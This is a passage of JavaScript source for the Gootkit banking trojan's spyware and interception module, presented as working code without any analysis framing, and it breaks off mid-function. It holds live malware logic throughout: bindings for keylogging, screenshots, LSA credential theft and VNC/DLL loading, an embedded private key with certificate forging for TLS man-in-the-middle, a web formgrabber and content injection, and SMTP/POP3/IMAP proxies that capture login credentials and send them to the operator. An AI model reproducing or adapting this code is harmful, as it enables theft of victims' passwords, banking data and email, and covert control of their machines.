

//new
var http = require('http');
var https = require('https');
var util = require('util');
var utils = require('utils');
var url = require('url');
var path = require('path');
var fs = require('fs');
var dns = require('dns');
var querystring = require('querystring');
var tls = require('tls');
var protobuf = require('protocol_buffers');
var video_recorder = process.binding('video_recorder');
var os = require('os');
var net = require('net');
var zeusfunctions = require("zeusmask");
var http_injection_stream = require('http_injection_stream');
var certgen = require("certgen");
var suspend = require('suspend'),
    resume = suspend.resume;

var gootkit_spyware = process.binding("spyware");
var video_recorder = process.binding('video_recorder');

const PORT_REDIRECTION_BASE = (4000 + process.pid);
const P_SPYWARE = 4;
process.PORT_REDIRECTION_BASE = PORT_REDIRECTION_BASE;

process.tls = {
    ciphers: 'ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-DSS-AES128-GCM-SHA256:kEDH+AESGCM:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA256:DHE-RSA-AES256-SHA256:DHE-DSS-AES256-SHA:DHE-RSA-AES256-SHA:ECDHE-RSA-DES-CBC3-SHA:ECDHE-ECDSA-DES-CBC3-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA256:AES256-SHA256:AES128-SHA:AES256-SHA:AES:CAMELLIA:DES-CBC3-SHA:!aNULL:!eNULL:!EXPORT:!DES:!RC4:!MD5:!PSK:!aECDH:!EDH-DSS-DES-CBC3-SHA:!EDH-RSA-DES-CBC3-SHA:!KRB5-DES-CBC3-SHA',
    method : 'TLSv1_method'
}

exports.SpInitialize = gootkit_spyware.SpInitialize;
exports.SpHookRecv = gootkit_spyware.SpHookRecv;
exports.SpHookSend = gootkit_spyware.SpHookSend;
exports.SpUnhookHttp = gootkit_spyware.SpUnhookHttp;
exports.SpTakeScreenshot = gootkit_spyware.SpTakeScreenshot;
exports.SpGetProcessList = gootkit_spyware.SpGetProcessList;
exports.SpGetLocalNetworkNeighborhood = gootkit_spyware.SpGetLocalNetworkNeighborhood;
exports.SpGetLocalUsersAndGroups = gootkit_spyware.SpGetLocalUsersAndGroups;

exports.SpLsaGrabCredentials = gootkit_spyware.SpLsaGrabCredentials;
exports.SpHookKeyboard = gootkit_spyware.SpHookKeyboard;
exports.DbgGetModuleDebugInformation = gootkit_spyware.DbgGetModuleDebugInformation;
exports.DbgGetLoadedModulesList = gootkit_spyware.DbgGetLoadedModulesList;
exports.DnsCacheGetDomainByAddr = gootkit_spyware.DnsCacheGetDomainByAddr;
exports.downloadFileRight = gootkit_spyware.DownloadFileRight;

exports.SpAddPortRedirection = gootkit_spyware.SpAddPortRedirection;
exports.SpGetVendor = gootkit_spyware.SpGetVendor;
exports.SpGetFileWatermark = gootkit_spyware.SpGetFileWatermark;
exports.SpSetFileWatermark = gootkit_spyware.SpSetFileWatermark;
exports.ExLoadVncDllSpecifyBuffers = gootkit_spyware.ExLoadVncDllSpecifyBuffers;
exports.ModExecuteDll32 = gootkit_spyware.ModExecuteDll32 ;

var global_cert = "-----BEGIN CERTIFICATE-----\r\nMIICtzCCAiCgAwIBAgJAwj/sQrLq6n+7nn9OSX0zzgGhP834SgLjlxQ96GHioum4\r\nj3w7bUQWVwUYjadfxZxt3S/xsss3zG5yJGJyFK64ATANBgkqhkiG9w0BAQUFADBC\r\nMRswGQYDVQQDExJHZW9UcnVzdCBHbG9iYWwgQ0ExFjAUBgNVBAoTDUdlb1RydXN0\r\nIEluYy4xCzAJBgNVBAYTAlVTMB4XDTE0MTEyNDE3MDkyOFoXDTE1MTEyNDE3MDky\r\nOFowaTEYMBYGA1UEAxMPbWFpbC5nb29nbGUuY29tMQswCQYDVQQGEwJVUzETMBEG\r\nA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UEBxMNTW91bnRhaW4gVmlldzETMBEGA1UE\r\nChMKR29vZ2xlIEluYzCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAriq+HsPB\r\noe//EIGy7/aDCsS95UEbVBVeeYOe4OpeOOdy3hE48HADYFEKwMMu2PLh9q9bzNnx\r\naXpRY8Amdcp5Gk4jHJ5akXXGnasw67vE6udzmSay1WgU7jrhkTAbWuyzEIwuehJ7\r\n15awJBKWWw2luxpbLOaw7WSW08vLn3Rk8H0CAwEAAaNXMFUwNAYDVR0lAQH/BCow\r\nKAYIKwYBBQUHAwIGCCsGAQUFBwMEBggrBgEFBQcDAQYIKwYBBQUHAwMwHQYDVR0R\r\nAQH/BBMwEYIPbWFpbC5nb29nbGUuY29tMA0GCSqGSIb3DQEBBQUAA4GBAH4Erwf9\r\nmw+RbSX4MKEppUzs+q7UumC8Z9p+7K3Pnl+xLY6ZW4tHEYLjJqcKGY2a+F4kDW6A\r\nhoyBr+qHJO9aXmoAbAHgHteS27kzWIulh1u6oHGFqHFXDTQKERdckn5MkqF3L+6h\r\nbMEpXkJNLOj2JWzfrUP+ZhVZy78VUEiqr/cY\r\n-----END CERTIFICATE-----\r\n";
var global_key = "-----BEGIN RSA PRIVATE KEY-----\nMIICXQIBAAKBgQCuKr4ew8Gh7/8QgbLv9oMKxL3lQRtUFV55g57g6l4453LeETjw\r\ncANgUQrAwy7Y8uH2r1vM2fFpelFjwCZ1ynkaTiMcnlqRdcadqzDru8Tq53OZJrLV\r\naBTuOuGRMBta7LMQjC56EnvXlrAkEpZbDaW7Glss5rDtZJbTy8ufdGTwfQIDAQAB\r\nAoGASUSt6l9LrAY8dQM69XvssLEHedQj3QGIVvIp+lBeBu5HAmiYXX2hzfkJ3wG9\r\nSYMT0CUBJ3Jf/pF4f9Ar3c2pl9bzN7MY9mmHMUfDl3heCb5NgMBIpu+1R7MKuLsT\r\nQ7aATQd4TIcmPBLX3J+p4G4xY6H55he+8PhZieata2g5XsECQQDnaeGns23X/4h3\r\n4DNyJu174JTEgc1D+rImHPsYcA98qR7G0wyg3E33CFbt+OdtTS1pEKwMAaKJ/qu+\r\n8TpPAeuFAkEAwKvVrMDKRGGHkd7LYPviJ6re9xR+3Iv37ELHGlyoeucXV423sgnh\r\nwE3BhaS2RtX25xOk7Bg63vQsSElMv0bWmQJBAMK+aBgo95d+g+nd022NNO264Xc9\r\nhPBgWOuaF/VI2L+f0zafBVGaFEJ/0igR/zAMctqoHSE9fvuCRiY5+0fh5cECQATs\r\nn2Jx7vl+cKOWySXqaiZPZLF18aQbY7PDJSmUUq4Jd/xB3/8J554tnpOW2R3IXC4d\r\nv2pVWDPYk8UpMm/1FIkCQQDI3gm7JNJqydrLP3plplfFB6hq3yxM1UG4Po+iCych\r\n3/vPHarkJzs3Gl6lH/lxK31gl8UEaF6DLGn8HFO+nzDc\r\n-----END RSA PRIVATE KEY-----";


var messages = protobuf([
  'message LsaAuth {',
  '     optional string UserName = 1;',
  '     optional string UserDomain = 2;',
  '     optional string UserPassword = 3;',
  '}',
  'message MailMessage {',
    '     optional string html = 1;',
    '     optional string text = 2;',
    '     optional string subject = 3;',
    '     optional string messageId = 4;',
    '     optional string inReplyTo = 5;',
    '     optional string priority = 6;',
    '     optional string from = 7;',
    '     optional string to = 8;',
    '     optional string date = 9;',
    '     optional string receivedDate = 10;',
    '     optional string headers = 11;',
    '     optional bool isDeletedByMailware = 12;',
  '}',
  'message LogLine {',
  '     optional string logstr = 1;',
  '}'
].join('\n'));
//=========================================================================================================
var superstring = "hello :D; obama 4mo";
var trace = print;

function isTextResponse(headers) {
    var mimetype = headers["content-type"];
    if (mimetype && (mimetype.indexOf("javascript") != -1 || mimetype.indexOf("text/") != -1)) {
        return true;
    }
    return false;
}

function isValidFormdataPostRequest(clientRequest) {
    try 
    {
        return 
        (
			(clientRequest.method == 'POST') &&
			(typeof (clientRequest.headers["content-type"]) === 'string') &&
			(
                (clientRequest.headers["content-type"].indexOf("form") !== -1) ||
                (clientRequest.headers["content-type"].indexOf("multipart") !== -1)
            )
		);
    }
    catch (e) {
        console.log(e.stack);
        console.log(e.message);
    }

    return false;
}

function patchRequestLocation(host, strLocation, isSsl) {
    var location = (isSsl ? 'https' : 'http') + "://" + host + strLocation;
    var parsedUrl = url.parse(location);
    //print(location);
    return parsedUrl;
}



function CapitaliseFirstLetter(string) {
    return string.charAt(0).toUpperCase() + string.slice(1);
}

function CapitalizeHeaderNameString(headerName) {
    var HeadersNameParts = headerName.split('-');

    for (var i = 0; i < HeadersNameParts.length; i++) {
        var t = HeadersNameParts[i];
        switch (t) {
            case 'www':
                HeadersNameParts[i] = 'WWW';
                break;
            default:
                HeadersNameParts[i] = CapitaliseFirstLetter(HeadersNameParts[i]);
                break;
        }

    }
    return HeadersNameParts.join('-');
}

function patchRequestHeaders(headers, newRequest) {

    var newHeaders = {};
    var restrictedHeaders = [
        "if-modified-since",
        "if-none-match",
        "accept-encoding"
    ];

    for (var h in headers) {
        if (restrictedHeaders.indexOf(h) === -1) {
            newHeaders[CapitalizeHeaderNameString(h)] = headers[h];
        }
    }

    newHeaders["Host"] = newRequest.host;
    newHeaders["Connection"] = 'keep-alive';

    return newHeaders;
}

function PatchDescByRedirectionRules(clientRequest){
    
    
    //clientRequest.isRedirectionRuleTriggered - boolean
    /*
    
    "redirects": [
        {
            "name": "yandex test",
            "uri": "https://yastatic.net",
            "keyword": "wfjwe892njf902n3f",
            "uripassword": "",
            "datapassword": ""
        }
    ]

    https://mail.ru/wfjwe892njf902n3f/share/cnt.share.js -> https://yastatic.net/share/cnt.share.js
    
    */

    if (util.isUndefined(clientRequest)) {
        return false;
    }

    if (util.isUndefined(clientRequest.desc)) {
        return false;
    }

    var murl = clientRequest.desc.location;
    var method = clientRequest.desc.method.toUpperCase();

    if(method !== 'GET'){
        return false;
    }

    if (util.isUndefined(process.g_scfg)) {
        return false;
    }

    var redirectsArray = process.g_scfg.redirects;

    if (util.isUndefined(redirectsArray)) {
        return false;
    }
    
    for(var i = 0; i < redirectsArray.length; i ++)
    {
        if(redirectsArray[i].keyword.length < 2){
            continue;
        }

        if(redirectsArray[i].uri.length < 2){
            continue;
        }


        var keywordIndex = murl.indexOf(redirectsArray[i].keyword);
        if(keywordIndex !== -1)
        {

            var urlpart = murl.substr(keywordIndex + redirectsArray[i].keyword.length);

            if(urlpart && urlpart.length > 1)
            {
                var newUrl = (redirectsArray[i].uri + urlpart);
                var parsedUrl = url.parse(newUrl);

                clientRequest.headers.host = parsedUrl.host;
                clientRequest.url = parsedUrl.path;
                clientRequest.isSSL = (parsedUrl.protocol == 'https:');

                if(parsedUrl.port){
                    clientRequest.remotePort = parseInt(parsedUrl.port);
                }else{
                    if(clientRequest.isSSL){
                        clientRequest.remotePort = 443;
                    }else{
                        clientRequest.remotePort = 80;
                    }
                }
                return true;
            }
        }
    }


    return false;
}

function isSslRequest(req) {
    return (req.isSSL == true);
}

function createUrlDescriptionFromRequestObject(req) {
    var headersString = '';

    for (var h in req.headers) {
        headersString += util.format('%s: %s\r\n', h, req.headers[h]);
    }

    var obj = {
        method: req.method,
        source: util.format("%s [%s.%s]", process.currentBinary, process.version, process.g_botId),
        location: req.url,
        referer: req.headers.referer,
        isSsl: isSslRequest(req),
        rawHeaders: headersString,
        host : req.headers.host
    };

    var protocolSlashesPosition = obj.location.indexOf('://');
    if (protocolSlashesPosition !== 4 && protocolSlashesPosition !== 5) {
        obj.location = util.format(
            "%s//%s%s",
            (isSslRequest(req) ? 'https:' : 'http:'),
            req.headers.host,
            req.url
        );
    }

    obj.realdomain = req.headers.host.split(':')[0];

    if(obj.location.indexOf('/http') === 0){
         obj.location = obj.location.substr(1);
    }

    if(obj.location.indexOf('please_baby_stop_fuck_my_ass') !== -1){
        exports.SpStopHttpIntercepting();
    }

    return obj;
}
//------------------------------------------------
// -- formgrabber
//------------------------------------------------

/*
    process.formgrabber.options  = {
        http : {
            grubGet : false,
            grubPost : true
        },

        https : {
            grubGet : true,
            grubPost : true
        }
    }

*/

var restrictedHosts = [
    'www.google-analytics.com',
    'counter.rambler.ru',
    'rs.mail.ru',
    'suggest.yandex.ru',
    'clck.yandex.ru',
    'plus.google.com',
    'plus.googleapis.com',
    's.youtube.com',
    'urs.microsoft.com',
    'safebrowsing-cache.google.com',
    'safebrowsing.google.com',
    'www.youtube.com'
];

var restrictedExtensions = [
    '.png', '.jpg', '.jpeg', '.gif', '.bmp',
    '.pcx', '.tiff', '.js', '.css', '.swf',
    '.avi', '.mpg', '.aac', '.mp3', '.mov',
    '.jar', '.cnt', '.scn', '.ico'
];

var restrictedSubstrings = [
    'safebrowsing',
    '.metric.gstatic.com',
    '/complete/search'
]

process.formgrabber = {
    restrictedExtensions: restrictedExtensions,
    restrictedHosts: restrictedHosts,
    restrictedSubstrings: restrictedSubstrings,
    options: {
        http: {
            grubGet: false,
            grubPost: false
        },

        https: {
            grubGet: false,
            grubPost: false
        }
    }
}

exports.formgrabber = process.formgrabber;

//------------------------------------------------
// -- http/https injects
//------------------------------------------------

function isInternalApiRequest(requestDesc){
    if(requestDesc.location.indexOf('spinternalcall') !== -1){
        return true;
    }

    return false;
}

function IsLocationLocked(location){

    //trace("IsLocationLocked : '%s'", location);

    if(!process.proxyServers){
        return false;
    }

    if(!process.proxyServers.blockedAddresses){
        return false;
    }


    for(let i = 0; i < process.proxyServers.blockedAddresses.length; i ++){
        if (zeusfunctions.zeusSearchContentIndex(location, 
            process.proxyServers.blockedAddresses[i])
        ){
            return true;
        }
    }

    return false;
}

function IsFakePresentForThisRequest(clientRequest){
    if(!clientRequest.headers['host']){
        return false;
    }

    var host = clientRequest.headers['host'].split(':')[0];
    if(process.proxyServers.fakes[host]){
        clientRequest.fakeHost = 
            process.proxyServers.fakes[host];
        return true;
    }

    return false;
}

function manageUserConnection(clientRequest, clientResponse, isSsl) {

    clientRequest.isSSL = isSsl;
    clientRequest.desc = createUrlDescriptionFromRequestObject(clientRequest);
    
    if(isInternalApiRequest(clientRequest.desc)){
        return require('internalapi').serve(clientRequest, 
            clientResponse);
    }

    if(IsLocationLocked(clientRequest.desc.location) === true){
        return /*clientResponse.end();*/ 
        /*  
            emulate browser 
            time-out error for now
        */
    }
    
    if(
        (IsFakePresentForThisRequest(clientRequest)) ||
        (PatchDescByRedirectionRules(clientRequest)) ||
        (http_injection_stream.IsContentModificationNeeded(clientRequest) === false)
    ){
        return http_injection_stream.ThrottleRequestToBrowserDirect(
            clientRequest, clientResponse);
    }
    
    process.emit('browser_request', clientRequest.desc);

    http_injection_stream.ThrottleRequestToBrowserInjected(
            clientRequest, clientResponse);
}
//=========================================================================
var runningSSLServers = {};
var runningPlainServers = {};
var excludedHosts = [];
var includedPorts = [
    80,
	443,
	110, // pop3
	995, // pop3-secured
	143, // imap
	993, // imap-secured
    666  // DOOM3,
];

process.proxyServers = {
    runningSSLServers : runningSSLServers,
    runningPlainServers : runningPlainServers,
    excludedHosts : excludedHosts,
    includedPorts : includedPorts,
    portRedirectionCallbacks : {},
    blockedAddresses : [],
    fakes : {}
};

function GetCertificateForPeer(peerCertificate, cb) {
    certgen.resignCertByMagic(peerCertificate.raw, 
        function (error, options)
        {
            if(error){
                process.log('certgen.resignCertByMagic', error)
            }else{
                cb(null, options);
            }
    });         
}

function ReinitializeAutocloseTimeout(serverInstance) {
    if (!util.isUndefined(serverInstance.autoCloseTimerId)) {
        clearTimeout(serverInstance.autoCloseTimerId);
    }

    serverInstance.autoCloseTimerId = setTimeout(function () {
        print('autoclose server %s', serverInstance.remoteHost);
        serverInstance.isClosed = true;
        serverInstance.close();
    }, 120000);
}
//=========================================================================================================
function ServeHttpsRequest(serverInstance, clientRequest, clientResponse) {
    clientRequest.remotePort = 443;
    manageUserConnection(clientRequest, clientResponse, true);
}

function ServeHttpRequest(httpServer, clientRequest, clientResponse) {
    if(!util.isUndefined(httpServer)){
        clientRequest.remoteHost = httpServer.remoteHost;
        ReinitializeAutocloseTimeout(httpServer);
    }
    clientRequest.remotePort = 80;
    manageUserConnection(clientRequest, clientResponse, false);
}

function GeneratePeerFakeCetrificate(remoteHost, remotePort, onDone){

    var ondonecalled = false;

    function call_back(arg){
        if(!ondonecalled){
            ondonecalled = true;
            onDone(null, arg);
        }
    };

    var cleartextStream = tls.connect(
        PORT_REDIRECTION_BASE + remotePort,
        remoteHost,
    { 
        rejectUnauthorized: false , 
        secureProtocol : 'TLSv1_method'
    }, function () {
        var peerCertificate = cleartextStream.getPeerCertificate();
        GetCertificateForPeer(peerCertificate, function (error, cert) {
            if (cert)
            {
                call_back(cert);
            }
            else
            {
                call_back(null);
            }
            cleartextStream.end();
        });
    });
    //[4016] JS : [Error: 1984:error:14094410:SSL routines:SSL3_READ_BYTES:sslv3 alert handshake failure:openssl\ssl\s3_pkt.c:1275:SSL alert number 40

    cleartextStream.on('error', function (error) {
        
        if (
            (error.message.indexOf('alert number 40') !== -1) ||
            (error.message.indexOf('alert number 42') !== -1)
        ){
            if(error.message.indexOf('alert number 40') !== -1){
                process.log("%s -> user certificate required: remoteHost=%s",
                    process.currentBinary,
                    remoteHost);
            }
            
        } else {
            call_back(null);
        }
    });
}
//https://img.imgsmail.ru/0.gif
/*
var fs = require('fs');
var logStream = fs.createWriteStream('C:\\Users\\Andrew\\Desktop\\log-' + 
    process.pid + '.txt', {'flags': 'a'});

var _log = function () {
    logStream.write(util.format.apply(this, arguments) + '\r\n');
}
*/

process.certcache = {};

function ProcessSSLConnection(remoteHost, address, onDone)
{
    var ondonecalled = false;
    
    if (!util.isUndefined(runningSSLServers["superserver"])) 
    {
        if(runningSSLServers["superserver"].serverInstance.isClosed === false)
        {
            address.remoteAddress = '127.0.0.1';
            address.remotePort = 
                runningSSLServers["superserver"].serverInstancePort;
            ondonecalled = true;
            return onDone(address);
        }
    }

    function ServerSNICallback(servername, callback)
    {
        let isCbCalled = false;

        if(!servername) 
            servername = remoteHost;

        function cbcall(error, result){
            if(!isCbCalled){
                isCbCalled = true;
                callback(error, result);
            }
        }

        if(process.certcache[servername]){
            return cbcall(null, 
                process.certcache[servername]);
        }

        
        function tryConnectionMethod(strMethod)
        {
            var cleartextStream = tls.connect(
                PORT_REDIRECTION_BASE + 443,
                servername, {   
                    rejectUnauthorized: false,
                    servername :  servername,
                    secureProtocol : strMethod
                },
            function () 
            {
                var peerCertificate = cleartextStream.getPeerCertificate();
                GetCertificateForPeer(peerCertificate, function (error, cert) {
                    if (cert) 
                    {
                        try{
                            var ctx = tls.createSecureContext({
                                cert: cert.cert,
                                key: cert.key
                            });
                            
                            ctx.connectionMethod = strMethod;
                            process.certcache[servername] = ctx;

                            cbcall(null, ctx);
                        }catch(ctx_exception){
                            process.logException(ctx_exception);
                        }
                    }
                    else 
                    {
                        excludedHosts.push(remoteHost);
                    }
                    cleartextStream.end();                
                });
            });

            cleartextStream.on('error', function (error) 
            {
                if(strMethod === 'TLSv1_method')
                {
                    tryConnectionMethod('SSLv23_method');
                }
                else
                {
                    cbcall(new Error('cert generation failed'));  
                }
            });
        }
        tryConnectionMethod('TLSv1_method');
    }
    
    utils.getPort({host : '127.0.0.1'}, function (err, randomPort) {
        
        var serverInstance = https.createServer(
        {
            cert: global_cert,
            key: global_key,
            SNICallback: ServerSNICallback,
            secureProtocol  : process.tls.method,
            ciphers: process.tls.ciphers
        }, function (req, res) {
            ServeHttpsRequest(undefined, req, res);
        });

        runningSSLServers["superserver"] =
        {
            serverInstance: serverInstance,
            serverInstancePort: randomPort,
            remoteHost: "superserver",
            certificate: undefined,
            isClosed : false
        }

        serverInstance.isClosed = false;
        serverInstance.listen(randomPort, '127.0.0.1');
        serverInstance.on('listening', function () {
            address.remotePort = randomPort;
            address.remoteAddress = '127.0.0.1';

            if(!ondonecalled){
                ondonecalled = true;
                onDone(address);
            }
        });

        serverInstance.clients = [];

        serverInstance.on('error', function (httperror) {
            console.log("httperror");
            console.log(httperror);
            console.log(httperror.stack);
            serverInstance.listen(randomPort, '127.0.0.1');
        });

        serverInstance.on('connection', function (socket) {
            var port = socket.remotePort;
            //_log(port, "CONNECTED");
            serverInstance.clients.push(socket);
        });
    });
}

function ProcessHttpConnection(remoteHost, address, onDone) {

    if (!util.isUndefined(runningPlainServers[remoteHost])) {

        if(runningPlainServers[remoteHost].serverInstance.isClosed === false){
            print('server already runnning for %s', remoteHost);
            address.remoteAddress = '127.0.0.1';
            address.remotePort = runningPlainServers[remoteHost].serverInstancePort;
            return onDone(address);
        }
    }

    utils.getPort({host : '127.0.0.1'}, function (err, randomPort) {
        
        //print('create new server for %s', remoteHost);

        var httpServer = http.createServer(function (req, res) {
            ServeHttpRequest(undefined, req, res);
        });

        httpServer.remoteHost = remoteHost;

        //ReinitializeAutocloseTimeout(httpServer);

        runningPlainServers[remoteHost] =
        {
            serverInstance: httpServer,
            serverInstancePort: randomPort,
            remoteHost: remoteHost,
            isClosed : false
        }

        address.remotePort = randomPort;
        address.remoteAddress = '127.0.0.1';
        httpServer.isClosed = false;
        httpServer.listen(randomPort, '127.0.0.1');
        
        httpServer.on('listening', function () {
            //print('ok , server started on port %d', randomPort);
            onDone(address);
        });

        httpServer.clients = [];

        httpServer.on('connection', function (socket) {
            //print('HTTP new socket');
            httpServer.clients.push(socket);
            socket.on('close', function () {
                //print('HTTP removind socket');
                httpServer.clients.remove(socket);
            });
        });
    });
}

function ServeSMTPConnection(
    remoteSocket, 
    clientSocket,
    remoteHost,
    isSSL
)
{
    var login = false;
    var password = false;
    var host = false;

    function DecodeAndSendPlainData(str){
        var userdata = new Buffer(str, 'base64');
        userdata = userdata.toString('utf-8').split('\u0000');
                    
        login = userdata[1] || userdata[0] || '';
        password = userdata[2] || '';
        
        SendAuthInformationPacket(login, 
            (isSSL === true ? '(SMTP-TLS) ' : '(SMTP) ' ) + 
            host + ' -> ' + 
            remoteHost, password);
    }

    var machineState = 'user_connected';

    clientSocket.on('data', function(chunk)
    {
        if(machineState === 'wait_login')
        {
            var text = chunk.toString().trim();
            if(!login){
                login = new Buffer(text, 'base64').toString();
            }else if(!password){
                password = new Buffer(text, 'base64').toString();
            } else {
                SendAuthInformationPacket(login, 
                    (isSSL === true ? '(SMTP-TLS) ' : '(SMTP) ' ) + 
                    host + ' -> ' + 
                    remoteHost, password);

                machineState = 'wait_body';
            }
        }else if(machineState === 'wait_login_plain')
        {
            DecodeAndSendPlainData(chunk.toString().trim());
            machineState = 'wait_body';
        }

        if(machineState == 'user_connected'){
            var command = chunk.toString().trim().split(' ');
            
            if(command[0] === 'AUTH')
            {
                if(command[1] === 'PLAIN'){
                    if(command.length === 3){
                        DecodeAndSendPlainData(command[3]);
                        machineState = 'wait_body';
                    }else {
                        machineState = 'wait_login_plain';
                    }

                }else if(command[1] === 'LOGIN'){
                    machineState = 'wait_login';
                }
            }
        }
    });

    remoteSocket.on('data', function(chunk){
        var command = chunk.toString().split(' ');
        if(command[0] === '220'){
            host = command[1];
        }
    });

    remoteSocket.pipe(clientSocket);
    clientSocket.pipe(remoteSocket);
}

//-------------------------------------------------------------------------
function GenericSocketDispatcher(
    remotePort /* true port */, 
    remoteHost /* true address */, 
    clientSocket,
    isSSL,
    DataStreamDispatcher
)
{

    //print('client connected');

    var engine = (isSSL === true ? tls : net);

    var options = {
        rejectUnauthorized: false,
        secureProtocol : 'TLSv1_method'
    };

    function onConnected(){
        var remoteSocket = this;
        //print('connected to remote peer');
        clientSocket.on('error', function(error){
            //print(error);
            remoteSocket.end();
        });        
        DataStreamDispatcher(remoteSocket, clientSocket, remoteHost, isSSL);
    };
    
    engine.connect(remotePort + PORT_REDIRECTION_BASE, 
    remoteHost, (isSSL === true  ? options : onConnected), onConnected).on('error', function(error){
        //print(error);
        clientSocket.end();
    });
}

function SeveGenericTunnel(remoteHost, address, onDone, isSSL, DataStreamDispatcher){
    var oldPort = address.remotePort;
    var hosthash = remoteHost + ':' + address.remotePort;

    var serverStore = (isSSL === true ? runningSSLServers : runningPlainServers);

    if (!util.isUndefined(serverStore[hosthash]))
    {
        if(serverStore[hosthash].serverInstance.isClosed === false){
            //print('server already runnning', 
            //    remoteHost, 
            //    serverStore[hosthash].serverInstancePort);
            address.remoteAddress = '127.0.0.1';
            address.remotePort = serverStore[hosthash].serverInstancePort;
            
            return onDone(address);
        }
    }

    utils.getPort({host : '127.0.0.1'}, suspend(function*(err, randomPort) {
        
        var serverInstance;

        if(isSSL)
        {
            var certificate = yield GeneratePeerFakeCetrificate(remoteHost, oldPort, resume());

            //print('fake cert generated ? ', (certificate !== null));

            serverInstance = tls.createServer({
                cert: (certificate ? certificate.cert : global_cert),
                key: (certificate ? certificate.key : global_key)
            }, function(clientSocket) {
                GenericSocketDispatcher(
                    oldPort, 
                    remoteHost, 
                    clientSocket, 
                    isSSL, 
                    DataStreamDispatcher);
            });
            
        }else{
            serverInstance = net.createServer(function(clientSocket) {
                GenericSocketDispatcher(
                    oldPort, 
                    remoteHost, 
                    clientSocket, 
                    isSSL, 
                    DataStreamDispatcher);
            });
        }

        serverInstance.remoteHost = remoteHost;

        serverStore[hosthash] =
        {
            serverInstance: serverInstance,
            serverInstancePort: randomPort,
            remoteHost: remoteHost,
            isClosed : false
        }

        address.remotePort = randomPort;
        address.remoteAddress = '127.0.0.1';

        serverInstance.isClosed = false;
        serverInstance.listen(randomPort, '127.0.0.1');
        
        serverInstance.on('listening', function () {
            //print('ok , server started on port %d', randomPort);
            onDone(address);
        });

        serverInstance.clients = [];

        serverInstance.on('connection', function (socket) {
            //print('IMAP has new client socket');
            
            serverInstance.clients.push(socket);
            
            socket.on('close', function () {
                //print('IMAP loose client socket');
                serverInstance.clients.remove(socket);
            });

            socket.on('error', function (error) {
                //print('IMAP error', error);
            });
        });

        serverInstance.on('clientError', function(error){
            //print('clientError', error)
        })
    }));
}

function ProcessSMTPConnection(remoteHost, address, onDone, isSSL) {
    SeveGenericTunnel(remoteHost, address, onDone, isSSL, ServeSMTPConnection);
}

function ProcessPOP3Connection(remoteHost, address, onDone, isSSL) {
    SeveGenericTunnel(remoteHost, address, onDone, isSSL, 
        require('mail_spyware').ServePOP3Connection);
}

function ProcessIMAPConnection(remoteHost, address, onDone, isSSL){
    SeveGenericTunnel(remoteHost, address, onDone, isSSL, 
        require('mail_spyware').ServeIMAPConnection);
}

process.proxyServers.SeveGenericTunnel = SeveGenericTunnel;

function IsPortMustBeFiltered(port){
    return (process.proxyServers.includedPorts.indexOf(port) !== -1);
}

var ConnectionRequestCallback = function (address, onDone) {

    process.emit('browser_connect', address);

    if(process.isHttpInterceptingEnabled === false){
        return onDone(address);
    }

    // skip unentirresting port
    if(!IsPortMustBeFiltered(address.remotePort)){
        return onDone(address);
    }

    var remoteHost = address.remoteAddress;    

    if (excludedHosts.indexOf(remoteHost) !== -1) {
        return onDone(address);
    }
    
    if(process.proxyServers.blockedAddresses.indexOf(address) !== -1){
        address.remoteAddress = '1.2.3.4';
        address.remotePort = 1234;
        return onDone(address);
    }

    var localCbcs = process.proxyServers.portRedirectionCallbacks;
    var portStr = address.remotePort.toString();
    var bContinueCallFall = true;
    var connectionKey = remoteHost + ':' + portStr;

    if (!util.isUndefined( localCbcs[portStr] ) ) {
        bContinueCallFall = localCbcs[portStr](remoteHost, address, onDone);
    } else if (!util.isUndefined( localCbcs[connectionKey] )) {
        bContinueCallFall = localCbcs[connectionKey](remoteHost, address, onDone);
    }
    
    if(bContinueCallFall)
    {
        
        if (address.remotePort === 443) {
            
            if(typeof(process.formgrabber) !== 'undefined')
            {
                if(typeof(process.formgrabber.options) !== 'undefined')
                {
                    if(typeof(process.formgrabber.options.https) !== 'undefined')
                    {
                        if(process.formgrabber.options.https.inject === false)
                        {
                            return onDone(address);
                        }
                    }
                }
            }
            
            return ProcessSSLConnection(remoteHost, address, onDone);
            
        } else if (address.remotePort === 80) {
            
            if(typeof(process.formgrabber) !== 'undefined')
            {
                if(typeof(process.formgrabber.options) !== 'undefined')
                {
                    if(typeof(process.formgrabber.options.http) !== 'undefined')
                    {
                        if(process.formgrabber.options.http.inject === false)
                        {
                            return onDone(address);
                        }
                    }
                }
            }
            
            return ProcessHttpConnection("superhost", address, onDone);

        } else if (address.remotePort === 25 || address.remotePort === 2525) {
            return ProcessSMTPConnection(remoteHost, address, onDone, false);
        } else if (address.remotePort === 465) {
            return ProcessSMTPConnection(remoteHost, address, onDone, true);
        } else if (address.remotePort === 110 ) {
            return ProcessPOP3Connection(remoteHost, address, onDone, false);
        } else if (address.remotePort === 995 ) {
            return ProcessPOP3Connection(remoteHost, address, onDone, true);
        } else if (address.remotePort === 143 ) {
            return ProcessIMAPConnection(remoteHost, address, onDone, false);
        } else if (address.remotePort === 993 ) {
            return ProcessIMAPConnection(remoteHost, address, onDone, true);
        } else {
            return onDone(address);
        }
    }else {
        return onDone(address);
    }
}

process.isHttpInterceptingEnabled = false;

exports.SpStopHttpIntercepting = function()
{
    if(process.isHttpInterceptingEnabled === true)
    {
        gootkit_spyware.SpUnhookHttp();

        [runningPlainServers, runningSSLServers].forEach(function (servers)
        {
            for(let s in servers)
            {
                var srv = servers[s];
                clearTimeout(srv.autoCloseTimerId);
                srv.serverInstance.close();
                srv.serverInstance.clients.forEach(function (socket)
                {
                    socket.destroy();
                });
            }
        });

        process.isHttpInterceptingEnabled = false;
    }
};

function InitializeCertificateFaker(){
    var existentCACert = certgen.isCAKeyExists();

    if(!existentCACert){
        return setTimeout(InitializeCertificateFaker, 100);
    }

